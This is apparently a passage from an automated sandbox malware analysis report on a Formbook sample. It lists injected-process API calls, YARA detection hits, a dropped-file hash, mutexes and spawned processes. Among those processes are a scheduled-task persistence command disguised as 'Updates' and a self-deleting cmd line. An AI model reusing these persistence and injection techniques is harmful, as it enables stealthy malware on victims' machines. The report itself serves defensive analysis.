Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9610 NtEnumerateValueKey,		4_2_056F9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F96D0 NtCreateKey,		4_2_056F96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9950 NtQueueApcThread,		4_2_056F9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F99D0 NtCreateProcessEx,		4_2_056F99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056FB040 NtSuspendThread,		4_2_056FB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9820 NtEnumerateKey,		4_2_056F9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F98A0 NtWriteVirtualMemory,		4_2_056F98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9B00 NtSetValueKey,		4_2_056F9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056FA3B0 NtGetContextThread,		4_2_056FA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9A10 NtQuerySection,		4_2_056F9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9A80 NtOpenDirectoryObject,		4_2_056F9A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9A50 NtCreateFile,LdrInitializeThunk,		10_2_02EC9A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9860 NtQuerySystemInformation,LdrInitializeThunk,		10_2_02EC9860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9840 NtDelayExecution,LdrInitializeThunk,		10_2_02EC9840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC99A0 NtCreateSection,LdrInitializeThunk,		10_2_02EC99A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		10_2_02EC9910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC96E0 NtFreeVirtualMemory,LdrInitializeThunk,		10_2_02EC96E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC96D0 NtCreateKey,LdrInitializeThunk,		10_2_02EC96D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9660 NtAllocateVirtualMemory,LdrInitializeThunk,		10_2_02EC9660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9650 NtQueryValueKey,LdrInitializeThunk,		10_2_02EC9650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9FE0 NtCreateMutant,LdrInitializeThunk,		10_2_02EC9FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9780 NtMapViewOfSection,LdrInitializeThunk,		10_2_02EC9780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9710 NtQueryInformationToken,LdrInitializeThunk,		10_2_02EC9710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC95D0 NtClose,LdrInitializeThunk,		10_2_02EC95D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9540 NtReadFile,LdrInitializeThunk,		10_2_02EC9540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9A80 NtOpenDirectoryObject,		10_2_02EC9A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9A20 NtResumeThread,		10_2_02EC9A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9A00 NtProtectVirtualMemory,		10_2_02EC9A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9A10 NtQuerySection,		10_2_02EC9A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02ECA3B0 NtGetContextThread,		10_2_02ECA3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9B00 NtSetValueKey,		10_2_02EC9B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC98F0 NtReadVirtualMemory,		10_2_02EC98F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC98A0 NtWriteVirtualMemory,		10_2_02EC98A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02ECB040 NtSuspendThread,		10_2_02ECB040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9820 NtEnumerateKey,		10_2_02EC9820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC99D0 NtCreateProcessEx,		10_2_02EC99D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9950 NtQueueApcThread,		10_2_02EC9950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9670 NtQueryInformationProcess,		10_2_02EC9670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9610 NtEnumerateValueKey,		10_2_02EC9610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC97A0 NtUnmapViewOfSection,		10_2_02EC97A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9760 NtOpenProcess,		10_2_02EC9760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02ECA770 NtOpenThread,		10_2_02ECA770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9770 NtSetInformationFile,		10_2_02EC9770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9730 NtQueryVirtualMemory,		10_2_02EC9730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02ECA710 NtOpenProcessToken,		10_2_02ECA710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC95F0 NtQueryInformationFile,		10_2_02EC95F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9560 NtWriteFile,		10_2_02EC9560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC9520 NtWaitForSingleObject,		10_2_02EC9520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02ECAD30 NtSetContextThread,		10_2_02ECAD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_007181C0 NtCreateFile,		10_2_007181C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_00718270 NtReadFile,		10_2_00718270
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_007182F0 NtClose,		10_2_007182F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_007183A0 NtAllocateVirtualMemory,		10_2_007183A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_007181BA NtCreateFile,		10_2_007181BA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071826A NtReadFile,		10_2_0071826A

Detected potential crypto function

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01121068		0_2_01121068
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_011222A0		0_2_011222A0
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_011204E0		0_2_011204E0
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01121820		0_2_01121820
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01124048		0_2_01124048
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01121067		0_2_01121067
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01125208		0_2_01125208
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01122290		0_2_01122290
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01125440		0_2_01125440
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_011256F0		0_2_011256F0
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01121811		0_2_01121811
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_011258E8		0_2_011258E8
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_01124BB0		0_2_01124BB0
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_0792158A		0_2_0792158A
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_07922D38		0_2_07922D38
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_07922D2A		0_2_07922D2A
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_09C4F278		0_2_09C4F278
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_0A3B4BB8		0_2_0A3B4BB8
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Code function: 0_2_0A3B1B71		0_2_0A3B1B71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_00401030		4_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041B8A3		4_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041C23F		4_2_0041C23F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041C2AF		4_2_0041C2AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041C3DF		4_2_0041C3DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_00408C60		4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041CC13		4_2_0041CC13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041B4A3		4_2_0041B4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_00402D90		4_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041BD9B		4_2_0041BD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041BE60		4_2_0041BE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041C603		4_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_00402FB0		4_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05781D55		4_2_05781D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B0D20		4_2_056B0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05782D07		4_2_05782D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CD5E0		4_2_056CD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057825DD		4_2_057825DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2581		4_2_056E2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577D466		4_2_0577D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C841F		4_2_056C841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05781FF1		4_2_05781FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578DFCE		4_2_0578DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D6E30		4_2_056D6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577D616		4_2_0577D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05782EF7		4_2_05782EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D4120		4_2_056D4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BF900		4_2_056BF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578E824		4_2_0578E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA830		4_2_056DA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771002		4_2_05771002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057828EC		4_2_057828EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057820A8		4_2_057820A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CB090		4_2_056CB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DAB40		4_2_056DAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05782B28		4_2_05782B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577DBD2		4_2_0577DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057703DA		4_2_057703DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EEBB0		4_2_056EEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0576FA2B		4_2_0576FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057822AE		4_2_057822AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F522AE		10_2_02F522AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F3FA2B		10_2_02F3FA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4DBD2		10_2_02F4DBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F403DA		10_2_02F403DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBEBB0		10_2_02EBEBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAAB40		10_2_02EAAB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F52B28		10_2_02F52B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F528EC		10_2_02F528EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB20A0		10_2_02EB20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F520A8		10_2_02F520A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9B090		10_2_02E9B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F5E824		10_2_02F5E824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAA830		10_2_02EAA830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F41002		10_2_02F41002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA4120		10_2_02EA4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8F900		10_2_02E8F900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F52EF7		10_2_02F52EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA6E30		10_2_02EA6E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4D616		10_2_02F4D616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F51FF1		10_2_02F51FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F5DFCE		10_2_02F5DFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4D466		10_2_02F4D466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9841F		10_2_02E9841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9D5E0		10_2_02E9D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F525DD		10_2_02F525DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB2581		10_2_02EB2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F51D55		10_2_02F51D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E80D20		10_2_02E80D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F52D07		10_2_02F52D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_00708C60		10_2_00708C60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071CC13		10_2_0071CC13
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_00702D90		10_2_00702D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_0071C603		10_2_0071C603
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_00702FB0		10_2_00702FB0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\zLIpEDZOH.exe 2ABB16D594F4B36FC8B8AAB8CAB7736350421C619CEC8E12E8975E87F7A99FAA

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 02E8B150 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 056BB150 appears 69 times

Sample file is different than original file name gathered from version info

Source: JAAkR51fQY.exe	Binary or memory string: OriginalFilename vs JAAkR51fQY.exe
Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs JAAkR51fQY.exe
Source: JAAkR51fQY.exe, 00000000.00000000.201623771.00000000007D8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename7 vs JAAkR51fQY.exe
Source: JAAkR51fQY.exe, 00000000.00000002.241594476.0000000009BC0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs JAAkR51fQY.exe
Source: JAAkR51fQY.exe, 00000000.00000002.239638081.0000000009810000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs JAAkR51fQY.exe
Source: JAAkR51fQY.exe, 00000000.00000002.228113773.0000000000EDA000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs JAAkR51fQY.exe
Source: JAAkR51fQY.exe	Binary or memory string: OriginalFilename7 vs JAAkR51fQY.exe

Uses 32bit PE files

Source: JAAkR51fQY.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: JAAkR51fQY.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: zLIpEDZOH.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/3@20/11

Creates files inside the user directory

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File created: C:\Users\user\AppData\Roaming\zLIpEDZOH.exe

Jump to behavior

Creates mutexes

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Mutant created: \Sessions\1\BaseNamedObjects\ClgKynUFvXeJiYbLYFNDwWt
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01

Creates temporary files

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File created: C:\Users\user\AppData\Local\Temp\tmp8416.tmp

Jump to behavior

PE file has an executable .text section and no other executable section

Source: JAAkR51fQY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Reads ini files

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: JAAkR51fQY.exe	Virustotal: Detection: 31%
Source: JAAkR51fQY.exe	ReversingLabs: Detection: 31%

Sample reads its own file content

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

File read: C:\Users\user\Desktop\JAAkR51fQY.exe

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\JAAkR51fQY.exe 'C:\Users\user\Desktop\JAAkR51fQY.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'			Jump to behavior
